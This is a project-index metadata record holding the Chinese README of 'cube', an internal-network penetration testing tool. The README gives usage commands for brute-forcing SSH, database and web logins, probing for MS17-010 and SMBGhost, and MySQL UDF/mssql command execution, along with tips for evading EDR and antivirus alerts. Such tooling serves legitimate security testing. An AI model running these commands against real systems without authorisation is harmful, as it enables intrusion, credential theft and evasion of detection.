{"id":13842204,"url":"https://github.com/JKme/cube","last_synced_at":"2025-07-11T14:31:17.455Z","repository":{"id":37328027,"uuid":"360818270","full_name":"JKme/cube","owner":"JKme","description":"内网渗透测试工具，弱密码爆破、信息收集和漏洞扫描","archived":false,"fork":false,"pushed_at":"2024-01-31T07:48:39.000Z","size":12272,"stargazers_count":595,"open_issues_count":0,"forks_count":65,"subscribers_count":12,"default_branch":"master","last_synced_at":"2024-11-21T12:45:05.354Z","etag":null,"topics":["crack","probe","sqlcmd"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/JKme.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-04-23T08:38:49.000Z","updated_at":"2024-11-14T01:46:32.000Z","dependencies_parsed_at":"2023-12-04T10:28:48.530Z","dependency_job_id":"747095d2-4ebb-4aad-8921-f314b7c84edf","html_url":"https://github.com/JKme/cube","commit_stats":null,"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/JKme/cube","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/JKme","download_url":"https://codeload.github.com/JKme/cube/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JKme%2Fcube/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264833273,"owners_count":23670617,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["crack","probe","sqlcmd"],"created_at":"2024-08-04T17:01:29.318Z","updated_at":"2025-07-11T14:31:16.875Z","avatar_url":"https://github.com/JKme.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"## 声明\n\u003e特别声明：此工具仅限于安全研究，禁止使用该项目进行违法操作，否则自行承担相关责任\n\n## 特点\n- 方便二次开发，快速增加插件\n- 支持输出结果到excel文档\n- 精简运行参数，方便记忆\n\n## 一把梭\n如果没有耐心看下面的命令选项，运行如下命令，然后打开pwn.xlsx，最终结果会以IP纬度聚合展示：\n```\ncube crack -x X -s 192.168.2.1/24 -o /tmp/pwn.xlsx\ncube probe -x Y -s 192.168.2.1/24 -o /tmp/pwn.xlsx\ncube probe -x K8S -s 192.168.2.1/24 -o /tmp/pwn.xlsx\t//如果内网存在k8s，会扫描2379，10250，6443端口\n```\n![report.png](./image/report.png)\n\n## 全局参数\n- `-v`: 输出内容更详细，一般用于调试\n- `-n`: 设定`crack`和`probe`模块的运行线程数量，默认30线程\n- `--delay`: 设定此选项参数为n的时候，`crack`和`probe`模块强制设为单线程，在线程运行之间休眠n秒，用于绕过EDR\n\n\n## 0x1. crack模块\n#### 使用内置词典爆破SSH\n```shell\ncube crack -s 192.168.1.1 -x ssh\n```\n#### 指定用户密码爆破SSH\n```shell\ncube crack -l root,ubuntu -p 123,000111,root -x ssh -s 192.168.1.1\ncube crack -L user.txt -P pass.txt -s 192.168.1.1/24 -x ssh\ncube crack -l root -P pass.txt -s 192.168.1.1/24 -x ssh\n```\n#### 指定端口爆破SSH\n```shell\ncube crack -l root -p root -s 192.168.1.1 -x ssh --port 2222\n```\n#### 使用内置词典爆破ssh和mysql\n```shell\n# 爆破mysql和ssh(注意ssh和mysql之间的逗号不存在空格)\ncube crack -s 192.168.1.1 -x ssh,mysql\n```\n#### 爆破phpmyadmin(不可与其它插件组合)\n```shell\ncube crack -s http://192.168.2.1 -x phpmyadmin\n```\n\n#### 爆破tomcat(不可与其它插件组合)\n```shell\ncube crack -x httpbasic -s http://127.0.0.1:7788/manager -v\n```\n\n#### 加载全部爆破插件（`httpbasic/jenkins/phpmyadmin/zabbix`除外）\n```shell\ncube crack -x X -s 192.168.1.1\n```\n\n* phpmyadmin这类http的爆破插件只能单独使用，不可与其它插件同时加载，类似的插件有: `httpbasic/jenkins/phpmyadmin/zabbix`\n* `httpbasic`模块是用来爆破使用basic auth认证的服务，比如tomcat登录，nginx的basic auth\n* `-x X`是加载全部可用的爆破插件，先检查端口，端口开放之后爆破\n* 未指定用户密码的时候，会加载内置词典\n* `zabbix`插件没有卵用，爆破5次失败之后会锁定30s\n* **默认线程是30，这种情况下爆破会触发x绒的告警，建议设定为10～15**\n\n#### 支持的爆破插件\n* 可组合使用: `elastic/ftp/mongo/mssql/mysql/postgres/redis/smb/ssh`\n* 不可组合使用： `httpbasic/jenkins/phpmyadmin/zabbix`\n\n## 0x2. probe模块\n#### 加载全部默认插件\n```shell\n# -x Y的时候加载全部probe插件， -x -X只会加载部分默认插件\ncube probe -x X -s 192.168.2.1/24\ncube probe -x Y -s 192.168.2.1/24\n```\n### 加载指定插件\n```shell\n# 加载oxid,ms17010插件\ncube probe -x oxid,ms17010 -s 192.168.2.1/24\n\n# 加载WIN集合插件，WIN集合插件下有 ping,netbios,oxid,smb,winrm,wmi,mssql\ncube probe -x WIN -s 192.168.2.1/24\n```\n\n#### 支持的探测插件\n| FUNC                                                            | PORT  | LOAD BY X |\n|-----------------------------------------------------------------|-------|-----------|\n| docker                                                          | 2375  | Y         |\n| dubbo                                                           | 20880 | Y         |\n| etcd                                                            | 2379  | Y         |\n| k8s10250                                                        | 10250 | N         |\n| k8s6443                                                         | 6443  | N         |\n| ms17010                                                         | 445   | Y         |\n| mssql                                                           | 1433  | N         |\n| netbios                                                         | 137   | N         |\n| oxid                                                            | 135   | Y         |\n| ping                                                            |       | N         |\n| rmi                                                             | 1099  | Y         |\n| smb                                                             | 445   | Y         |\n| smbghost                                                        | 445   | Y         |\n| winrm                                                           | 5985  | N         |\n| wmi                                                             | 135   | N         |\n| zookeeper                                                       | 2181  | Y         |\n| [jboss](https://github.com/JKme/cube/wiki#jboss-3873)           | 3873  | Y         |\n| [prometheus](https://github.com/JKme/cube/wiki#prometheus-9090) | 9090  | Y         |\n\n* `smb/wmi/winrm/mssql`是利用NTLM认证过程获取[Windows版本系统信息](https://jkme.github.io/2021/08/06/windows-ntlm-smb-scan.html)\n* 使用`ping/netbios`的时候，最好单独使用获取更准确的结果，线程数量建议为10\n* `Load By X`: 是指`cube probe -x X -s 192.168.2.1/24`的时候，`-x X`是否需要加载的插件\n\n## 0x3. 结果输出\n在使用`crack`和`probe`模块的任何插件都可以加上`-o result.xlsx`，用于把结果写入到excel，当excel已经存在\n的时候，cube会把当前扫描的结果自动追加到文档，建议扫描结束之后的文档固定首行首列，查看更方便。\n\n## 0x4. 快速开发\n#### Crack模块\nCrack模块可以抽象为一个爆破的框架，当需要爆破的插件不在Cube可用插件列表里面，可以使用go快速开发爆破插件。\n`crack`模块下的命令参数同样适用新增的插件，比如`-l/-L，-p/-P，--port`。 比如新增一个自定义爆破插件，插件名是`cloud`，默认端口`8080`，爆破的默认密码使用内置的`config.PASSWORDS`，插件需要实现`crack`模块的以下接口：\n```shell\n\tCrackName() string       //插件名称\n\tCrackPort() string       //插件默认端口\n\tCrackAuthUser() []string //插件默认爆破的用户名\n\tCrackAuthPass() []string //插件默认爆破的密码，可以使用config.PASSWORD\n\tIsMutex() bool           //是否是只能单独使用的插件，比如爆破phpmyadmin类的http插件，当然elastic是个例外\n\tCrackPortCheck() bool    //是否需要端口检查，TCP协议设置为true，phpmyadmin单独使用的插件和UDP协议类的跳过端口检测，设置为false\n\tExec() CrackResult       //爆破插件的具体实现\n```\n![crack.gif](./image/crack.gif)\n\n\n * 如果需要`-x X`加载`cloud`, 修改`config/config.go`，把`cloud`加入到`CrackX`列表里面\n\n#### Probe模块\n同样新增Probe插件和crack类似，也可以看作信息收集的框架，新增的插件需要实现以下接口:\n\n```shell\n\tProbeName() string      //插件名称\n\tProbePort() string      //插件默认端口\n\tPortCheck() bool        //是否需要端口检查\n\tProbeExec() ProbeResult //执行插件\n```\n\n## 0x5 Sqlcmd模块\n用于mysql的UDF提权(暂时支持windows x64)，mssql命令执行：\n```shell\n#开启UDF执行命令\ncube sqlcmd -x mysql -l root -p root -e \"whoami\"\n\n#清除xp_cmdshell\ncube sqlcmd -x mysql -l root -p root -e \"clear\"\n\n#指定mssql端口\ncube sqlcmd -x mssql -l sa -p sa -e \"whoami\" --port 4134\n```\n#### 可用插件\n![report.png](./image/sqlcmd.png)\n\n\n\n### 参考\n* [X-Crack](https://github.com/netxfly/x-crack)\n* [LadonGo](https://github.com/k8gege/LadonGo)\n* [fscan](https://github.com/shadow1ng/fscan)\n* [gobuster](https://github.com/OJ/gobuster)\n* [sqltool](https://github.com/mabangde/pentesttools/blob/master/golang/sqltool.go)\n* [F-Scrack](https://github.com/y1ng1996/F-Scrack)\n\n\n## TODO\n* [数据库利用工具](http://ryze-t.com/posts/2022/02/16/%E6%95%B0%E6%8D%AE%E5%BA%93%E8%BF%9E%E6%8E%A5%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7-Sylas.html)\n* [MDUT](https://github.com/SafeGroceryStore/MDUT)\n* 完成SQLCMD模块\n```\n  -m ls  \u003cdst path\u003e\n  -m cat \u003cdst file\u003e\n  -m upload \u003csrc path\u003e \u003cdst path\u003e\n  -m exec \u003ccmd string\u003e\n```\n\n```shell\ncube sqlcmd -s 127.0.0.1 -l root -p root -x mssql exec \"whoami\"\ncube sqlcmd -s 127.0.0.1 -l root -p root -x mssql upload  \u003csrc\u003e \u003cdst\u003e\ncube sqlcmd -s 127.0.0.1 -l root -p root -x mssql ls  \u003csrc\u003e\ncube sqlcmd -s 127.0.0.1 -l root -p root -x mssql cat  \u003csrc\u003e \n```\n* [检查某个方法是否实现了接口](https://go.dev/play/p/tNNDukK4wRi)\n* probe模块下的mssql探测好像存在问题，需要确认\n\n---\n### Stargazers over time\n\n[![Stargazers over time](https://starchart.cc/JKme/cube.svg)](https://starchart.cc/JKme/cube)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJKme%2Fcube","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FJKme%2Fcube","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJKme%2Fcube/lists"}